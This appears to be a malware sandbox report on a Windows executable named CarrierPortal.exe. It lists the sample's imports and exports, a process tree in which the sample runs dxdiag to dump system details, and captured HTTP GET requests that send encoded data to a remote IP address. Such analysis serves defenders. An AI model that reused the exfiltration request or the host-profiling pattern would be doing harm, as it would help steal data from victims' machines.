api-ms-win-crt-math-l1-1-0.dll | __setusermatherr
api-ms-win-crt-locale-l1-1-0.dll | _configthreadlocale
WINHTTP.dll | WinHttpOpen, WinHttpGetIEProxyConfigForCurrentUser, WinHttpGetProxyForUrl
ncrypt.dll | NCryptGetProperty, NCryptFreeObject, NCryptVerifySignature, NCryptSignHash, NCryptTranslateHandle, NCryptExportKey, NCryptImportKey, NCryptDecrypt, NCryptEncrypt, NCryptOpenStorageProvider
CRYPT32.dll | CertEnumCertificatesInStore, CertCloseStore, CertFreeCertificateChain, CertGetCertificateChain, CertOpenSystemStoreA, CertGetNameStringW, CryptAcquireCertificatePrivateKey, CertGetPublicKeyLength, CertOpenStore
Secur32.dll | CompleteAuthToken, DeleteSecurityContext, InitializeSecurityContextA, FreeCredentialsHandle, AcquireCredentialsHandleA
IPHLPAPI.DLL | GetIfEntry2, GetIfTable2, GetUnicastIpAddressTable, GetAnycastIpAddressTable, FreeMibTable, ConvertInterfaceNameToLuidW, ConvertInterfaceLuidToNameW, ConvertLengthToIpv4Mask, GetAdaptersAddresses
                                                                  Name | Ordinal | Address
                                                                  IsolateEnterStub__CEntryPointNativeFunctions__attachThread__LWiahz8fydJWgxqffuaEC2 | 1 | 0x140019440
                                                                  IsolateEnterStub__CEntryPointNativeFunctions__createIsolate__aVxZJEvxfd8FslyQXMlHNI | 2 | 0x1400195f0
                                                                  IsolateEnterStub__CEntryPointNativeFunctions__detachAllThreadsAndTearDownIsolate__OPBluFOA7k6a9G1cqb6TTL | 3 | 0x1400197b0
                                                                  IsolateEnterStub__CEntryPointNativeFunctions__detachThread__vZogK8TBGAIeNIWWaZu2QH | 4 | 0x140019a00
                                                                  IsolateEnterStub__CEntryPointNativeFunctions__getCurrentThread__p19YkdKU3I3cgUmQuiiTd0 | 5 | 0x140019c70
                                                                  IsolateEnterStub__CEntryPointNativeFunctions__getIsolate__4JMPcmfHydBLuvj7ff2do8 | 6 | 0x140019e20
                                                                  IsolateEnterStub__CEntryPointNativeFunctions__tearDownIsolate__I3DVyDKs6z4vL79kJC9BEE | 7 | 0x140019e50
                                                                  IsolateEnterStub__JNIInvocationInterface_0024Exports__JNI__CreateJavaVM__zfv8XhXAFhERNPUoh38uvF | 8 | 0x140037820
                                                                  IsolateEnterStub__JNIInvocationInterface_0024Exports__JNI__GetCreatedJavaVMs__jTTCq2UmbC48XDHPdLhle5 | 9 | 0x140037b80
                                                                  IsolateEnterStub__JNIInvocationInterface_0024Exports__JNI__GetDefaultJavaVMInitArgs__8P9gtUmW2O2BqcAmkyOH99 | 10 | 0x140018710
                                                                  IsolateEnterStub__JavaMainWrapper__run__cXbfAhOWcF90761nQYco7L | 11 | 0x140038ee0
                                                                  JNI_CreateJavaVM | 12 | 0x140037820
                                                                  JNI_GetCreatedJavaVMs | 13 | 0x140037b80
                                                                  JNI_GetDefaultJavaVMInitArgs | 14 | 0x140018710
                                                                  __svm_code_section | 15 | 0x140001000
                                                                  __svm_version_info | 16 | 0x140868d70
                                                                  __svm_vm_java_version | 17 | 0x140868d10
                                                                  __svm_vm_target_ccompiler | 18 | 0x140868e58
                                                                  __svm_vm_target_libc | 19 | 0x140868ea0
                                                                  __svm_vm_target_libraries | 20 | 0x140868ee8
                                                                  __svm_vm_target_platform | 21 | 0x140869020
                                                                  __svm_vm_target_staticlibraries | 22 | 0x1408691d0
                                                                  graal_attach_thread | 23 | 0x140019440
                                                                  graal_create_isolate | 24 | 0x1400195f0
                                                                  graal_detach_all_threads_and_tear_down_isolate | 25 | 0x1400197b0
                                                                  graal_detach_thread | 26 | 0x140019a00
                                                                  graal_get_current_thread | 27 | 0x140019c70
                                                                  graal_get_isolate | 28 | 0x140019e20
                                                                  graal_tear_down_isolate | 29 | 0x140019e50
                                                                  main | 30 | 0x140038ee0
                                                                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                  Jan 4, 2025 23:07:37.810419083 CET | 49713 | 80 | 192.168.2.16 | 162.243.76.72
                                                                  Jan 4, 2025 23:07:37.815234900 CET | 80 | 49713 | 162.243.76.72 | 192.168.2.16
                                                                  Jan 4, 2025 23:07:37.815339088 CET | 49713 | 80 | 192.168.2.16 | 162.243.76.72
                                                                  Jan 4, 2025 23:07:37.815583944 CET | 49713 | 80 | 192.168.2.16 | 162.243.76.72
                                                                  Jan 4, 2025 23:07:37.820343018 CET | 80 | 49713 | 162.243.76.72 | 192.168.2.16
                                                                  Jan 4, 2025 23:07:37.820425034 CET | 80 | 49713 | 162.243.76.72 | 192.168.2.16
                                                                  Jan 4, 2025 23:07:38.264491081 CET | 80 | 49713 | 162.243.76.72 | 192.168.2.16
                                                                  Jan 4, 2025 23:07:38.305079937 CET | 49713 | 80 | 192.168.2.16 | 162.243.76.72
                                                                  Jan 4, 2025 23:07:38.872550011 CET | 49713 | 80 | 192.168.2.16 | 162.243.76.72
                                                                  Jan 4, 2025 23:08:32.455307961 CET | 49748 | 80 | 192.168.2.16 | 162.243.76.72
                                                                  Jan 4, 2025 23:08:32.460237026 CET | 80 | 49748 | 162.243.76.72 | 192.168.2.16
                                                                  Jan 4, 2025 23:08:32.460331917 CET | 49748 | 80 | 192.168.2.16 | 162.243.76.72
                                                                  Jan 4, 2025 23:08:32.460556030 CET | 49748 | 80 | 192.168.2.16 | 162.243.76.72
                                                                  Jan 4, 2025 23:08:32.465363979 CET | 80 | 49748 | 162.243.76.72 | 192.168.2.16
                                                                  Jan 4, 2025 23:08:32.465506077 CET | 80 | 49748 | 162.243.76.72 | 192.168.2.16
                                                                  Jan 4, 2025 23:08:32.908137083 CET | 80 | 49748 | 162.243.76.72 | 192.168.2.16
                                                                  Jan 4, 2025 23:08:32.955153942 CET | 49748 | 80 | 192.168.2.16 | 162.243.76.72
                                                                  Jan 4, 2025 23:08:33.425481081 CET | 49748 | 80 | 192.168.2.16 | 162.243.76.72
                                                                  • 162.243.76.72
                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  0 | 192.168.2.16 | 49713 | 162.243.76.72 | 80 | 3012 | C:\Users\user\Desktop\CarrierPortal.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Jan 4, 2025 23:07:37.815583944 CET1585OUTGET /signin.php?form=form&post=PT1RTXlWR2JzRkdkejVXUw%3D%3D&data=PW93VktSa1l4QVhNU1ZUVDZsVk5HVlVaT1pVUmo5bVN5WWxVS3BHVkNKRVNTQkZlSFYyVk8xV1RYeDJNWmgzWnVGbVdrWlVaM2htVlNkRVp6a2xSS1pVWXJSMmFTcG1VeElWTnZkMVZZaDJNWmRGWnJaRk1PMW1VelFYVlVWRmJ3MFVUd2RWVXhFRE1SQnpaekVsYnhRRlVLUTBNbFEwTWxFRlZWWjBhTnB3VmtWa1l3QVhNVk5rV3VkRmNLVlVUb1JXUmlaRGJGTjFTNEpUV0l4R1ZsdG1Vd0ltYnhBVFYwRUVSVVpEYndRbVR3ZGxWNnhXUlNaa1Q2UlZjR0JUVFFCM1ZUQlRUd0VXTmo1MlZaQlhSaHRHWkZKV013WlZaREpsVmFsVk5GMVVZa1pVVHlzMmFTdG1RdWxGZEt4R1pyNUVWVTVXTUZabFFrZGxWSkIzYWtwa1VWZDFkM0JqVkxKRVNhUmtSd0ltVFNaVlV4RURNUk5EWlhWVmRhWjBZcFJXVlY1V01GWmxjazVHVkZabFJqcGtUd29GTjVVa1ZDSkVWVVJsVnExa1c0ZDFUMUFYTVdSRGVYZFZXMVVrWU5CM1ZTRkRNRlpsU2s1R1Z3SkVSbDlrVVZGVmV6VlZWM0ZUVlhobFZxSjJha3htVTFCblJXWkhadFZGV1dwbVlwUldSaVpqUnlFbFE1Y2xWMHBGYmloR1pXOVVNc0ZqVnpRMlZXbFhXRzEwYWtWa1l4QUhibFpIWnRWRldXcG1ZcFJXUmlaalJ5RWxjMFZsVkpCM2FrcGxTcVpsTk8xV1QxczJNVUJuU3JOVmExMFdWenBrTVI5bVR4TUZWS1ZrVXA1a2FUTkhkckoxVTFBelVWeEdNYUpsUnFGMVZzVmtVYXBFVlVWa1J3b2xVT1ZWVTFnM2FoSkZaWU5sUlNkMVVzeDJWUlpYTndFMVFTVmx [TRUNCATED]
                                                                  User-Agent: Java/23.0.1
                                                                  Host: 162.243.76.72
                                                                  Accept: */*
                                                                  Connection: keep-alive
                                                                  Jan 4, 2025 23:07:38.264491081 CET | 184 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Sat, 04 Jan 2025 22:07:38 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  1 | 192.168.2.16 | 49748 | 162.243.76.72 | 80 | 1092 | C:\Users\user\Desktop\CarrierPortal.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Jan 4, 2025 23:08:32.460556030 CET1585OUTGET /signin.php?form=form&post=PT1RTXlWR2JzRkdkejVXUw%3D%3D&data=PW93VktSa1l4QVhNU1ZUVDZsVk5HVlVaT1pVUmo5bVN5WWxVS3BHVkNKRVNTQkZlSFYyVk8xV1RYeDJNWmgzWnVGbVdrWlVaM2htVlNkRVp6a2xSS1pVWXJSMmFTcG1VeElWTnZkMVZZaDJNWmRGWnJaRk1PMW1VelFYVlVWRmJ3MFVUd2RWVXhFRE1SQnpaekVsYnhRRlVLUTBNbFEwTWxFRlZWWlVWbHB3VmtWa1l3QVhNVk5rV3VkRmNLVlVUb1JXUmlaRGJGTjFTNEpUV0l4R1ZsdG1Vd0ltYnhBVFYwRUVSVVpEYndRbVR3ZGxWNnhXUlNaa1Q2UlZjR1ZrVFFCM1ZUUmpUd0VXTmo1MlZaQlhSaHRHWkZKV013WlZaREpsVmFsVk5GMVVZa1pVVHlzMmFTdG1RdWxGZEt4R1pyNUVWVTVXTUZabFFrZGxWSkIzYWtwa1VWZDFkM0JqVkxKRVNhUmtSd0ltVFNaVlV4RURNUk5EWlhWVmRhWjBZcFJXVlY1V01GWmxjazVHVkZabFJqcGtUd29GTjVVa1ZDSkVWVVJsVnExa1c0ZDFUMUFYTVdSRGVYZFZXMVVrWU5CM1ZTRkRNRlpsU2s1R1Z3SkVSbDlrVVZGVmV6VlZWM0ZUVlhobFZxSjJha3htVTFCblJXWkhadFZGV1dwbVlwUldSaVpqUnlFbFE1Y2xWMHBGYmloR1pXOVVNc0ZqVnpRMlZXbFhXRzEwYWtWa1l4QUhibFpIWnRWRldXcG1ZcFJXUmlaalJ5RWxjMFZsVkpCM2FrcGxTcVpsTk8xV1QxczJNVUJuU3JOVmExMFdWenBrTVI5bVR4TUZWS1ZrVXA1a2FUTkhkckoxVTFBelVWeEdNYUpsUnFGMVZzVmtVYXBFVlVWa1J3b2xVT1ZWVTFnM2FoSkZaWU5sUlNkMVVzeDJWUlpYTndFMVFTVmx [TRUNCATED]
                                                                  User-Agent: Java/23.0.1
                                                                  Host: 162.243.76.72
                                                                  Accept: */*
                                                                  Connection: keep-alive
                                                                  Jan 4, 2025 23:08:32.908137083 CET | 184 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Sat, 04 Jan 2025 22:08:32 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Target ID:0
                                                                  Start time:17:07:27
                                                                  Start date:04/01/2025
                                                                  Path:C:\Users\user\Desktop\CarrierPortal.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Users\user\Desktop\CarrierPortal.exe"
                                                                  Imagebase:0x7ff68edf0000
                                                                  File size:21'461'272 bytes
                                                                  MD5 hash:4C6D58378BE4B9051DEBFB5670F5B82C
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Target ID:2
                                                                  Start time:17:07:28
                                                                  Start date:04/01/2025
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:cmd.exe /c dxdiag /t C:\Users\user\AppData\Local\Temp\iPopWYeOjnPUTsl44DoJ4i6LpO3Hfrmj.txt
                                                                  Imagebase:0x7ff6fd780000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:3
                                                                  Start time:17:07:28
                                                                  Start date:04/01/2025
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6684c0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:4
                                                                  Start time:17:07:28
                                                                  Start date:04/01/2025
                                                                  Path:C:\Windows\System32\dxdiag.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:dxdiag /t C:\Users\user\AppData\Local\Temp\iPopWYeOjnPUTsl44DoJ4i6LpO3Hfrmj.txt
                                                                  Imagebase:0x7ff78bba0000
                                                                  File size:272'384 bytes
                                                                  MD5 hash:19AB5AD061BF013EBD012D0682DF37E5
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Target ID:6
                                                                  Start time:17:07:33
                                                                  Start date:04/01/2025
                                                                  Path:C:\Windows\System32\drivers\mstee.sys
                                                                  Wow64 process (32bit):
                                                                  Commandline:
                                                                  Imagebase:
                                                                  File size:12'288 bytes
                                                                  MD5 hash:244C73253E165582DDC43AF4467D23DF
                                                                  Has elevated privileges:
                                                                  Has administrator privileges:
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:moderate
                                                                  Has exited:false

                                                                  Target ID:7
                                                                  Start time:17:07:33
                                                                  Start date:04/01/2025
                                                                  Path:C:\Windows\System32\drivers\mskssrv.sys
                                                                  Wow64 process (32bit):
                                                                  Commandline:
                                                                  Imagebase:
                                                                  File size:34'816 bytes
                                                                  MD5 hash:26854C1F5500455757BC00365CEF9483
                                                                  Has elevated privileges:
                                                                  Has administrator privileges:
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:moderate
                                                                  Has exited:false

                                                                  Target ID:16
                                                                  Start time:17:07:57
                                                                  Start date:04/01/2025
                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
                                                                  Imagebase:0x7ff7582a0000
                                                                  File size:452'608 bytes
                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  Target ID:17
                                                                  Start time:17:07:57
                                                                  Start date:04/01/2025
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6684c0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  Target ID:18
                                                                  Start time:17:08:21
                                                                  Start date:04/01/2025
                                                                  Path:C:\Users\user\Desktop\CarrierPortal.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Users\user\Desktop\CarrierPortal.exe"
                                                                  Imagebase:0x7ff68edf0000
                                                                  File size:21'461'272 bytes
                                                                  MD5 hash:4C6D58378BE4B9051DEBFB5670F5B82C
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Target ID:19
                                                                  Start time:17:08:21
                                                                  Start date:04/01/2025
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:cmd.exe /c dxdiag /t C:\Users\user\AppData\Local\Temp\z6bA4AJyM3lgigrkALKVxYH0Lsl0yEgV.txt
                                                                  Imagebase:0x7ff6fd780000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:20
                                                                  Start time:17:08:21
                                                                  Start date:04/01/2025
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6684c0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:21
                                                                  Start time:17:08:21
                                                                  Start date:04/01/2025
                                                                  Path:C:\Windows\System32\dxdiag.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:dxdiag /t C:\Users\user\AppData\Local\Temp\z6bA4AJyM3lgigrkALKVxYH0Lsl0yEgV.txt
                                                                  Imagebase:0x7ff78bba0000
                                                                  File size:272'384 bytes
                                                                  MD5 hash:19AB5AD061BF013EBD012D0682DF37E5
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:22
                                                                  Start time:17:08:35
                                                                  Start date:04/01/2025
                                                                  Path:C:\Windows\System32\Taskmgr.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\system32\taskmgr.exe" /4
                                                                  Imagebase:0x7ff78e410000
                                                                  File size:1'213'232 bytes
                                                                  MD5 hash:58D5BC7895F7F32EE308E34F06F25DD5
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:25
                                                                  Start time:17:08:36
                                                                  Start date:04/01/2025
                                                                  Path:C:\Windows\System32\Taskmgr.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\system32\taskmgr.exe" /4
                                                                  Imagebase:0x7ff78e410000
                                                                  File size:1'213'232 bytes
                                                                  MD5 hash:58D5BC7895F7F32EE308E34F06F25DD5
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

Strings

Memory Dump Source
• Source File: 00000000.00000002.1282205867.00000146244BC000.00000004.00000020.00020000.00000000.sdmp, Offset: 00000146244BC000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_146244bc000_CarrierPortal.jbxd
Similarity
• API ID:
• String ID: 8f08$C:\U$user$Cons$Wind$\Use$\\CA$user
• API String ID: 0-1711692963
• Opcode ID: 2dc819bd4b109ec4a80fe83f5a40ca577545bd6007848d12a1232f4e1e4d8408
• Instruction ID: 03ab72803e3337ec5c80c8564833b41e26ccdd059c689bb5bf3c641cb40f1cc7
• Opcode Fuzzy Hash: 2dc819bd4b109ec4a80fe83f5a40ca577545bd6007848d12a1232f4e1e4d8408
• Instruction Fuzzy Hash: 54E127A500E7C56FD31787309C69AA17FB4AF53218B0E86EBC4C1CF5E3D259494AC762

Memory Dump Source
• Source File: 00000000.00000002.1284973930.000001462501E000.00000004.00000001.00040000.00000003.sdmp, Offset: 000001462501E000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1462501e000_CarrierPortal.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 66ddcab0168562b4cae9729ac3466f126074edb4e3fab54897de1a30479178ff
• Instruction ID: f4c661c14626d6f261e242f8018524a28fb379bbd84bd66580d4abb127c04221
• Opcode Fuzzy Hash: 66ddcab0168562b4cae9729ac3466f126074edb4e3fab54897de1a30479178ff
• Instruction Fuzzy Hash: 4802EB6244E3C16FD7138B348C6AA927FB0AF17214B0E05DBC4C1CF8A3E259595AC763